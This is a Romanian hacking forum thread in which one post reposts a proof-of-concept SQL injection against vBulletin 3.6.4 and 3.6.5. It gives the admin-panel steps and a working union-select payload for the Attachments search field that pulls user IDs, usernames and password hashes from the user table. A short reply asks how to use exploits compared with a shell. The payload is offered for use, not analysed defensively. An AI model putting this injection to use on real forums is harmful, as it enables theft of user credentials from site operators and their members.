Hacking and more...
HaCkinG CulT
|
Lista Forumurilor Pe Tematici
|
Hacking and more... | Reguli | Inregistrare | Login
POZE HACKING AND MORE...
Nu sunteti logat.
|
Nou pe simpatie:
crazylife la Simpatie.ro
 | Femeie
25 ani
Bucuresti
cauta Barbat
25 - 47 ani |
|
|
Ras
Little Kevin
Inregistrat: acum 17 ani
Postari: 45
|
|
Code:
/****************************************/
CREDIT:
discovered by meto5757 and disfigure
PRODUCT:
vBulletin
http://www.vbulletin.com/
VULNERABILITY:
SQL Injection
NOTES:
- not a serious vulnerability, can only be used by administrator of site
- SQL injection can be used to obtain password hash
- tested on 3.6.4 and 3.6.5
POC:
1. Log in to admin panel
2. Go to Attachments->Search
3. Place the following string in the Attached Before field:
') union select 1,1,1,1,1,userid,password,1,username from user -- 9
greets: No_Advertising.com
/****************************************/ |
|
|
| pus acum 16 ani |
|
ufo51cs
Membru nou
 Inregistrat: acum 16 ani
Postari: 5
|
|
aaa cum folosesti un exploit ca banuiesc ca e diferit de cum folosesti un shell  ceea ce folosesc eu ... 
|
|
| pus acum 16 ani |
|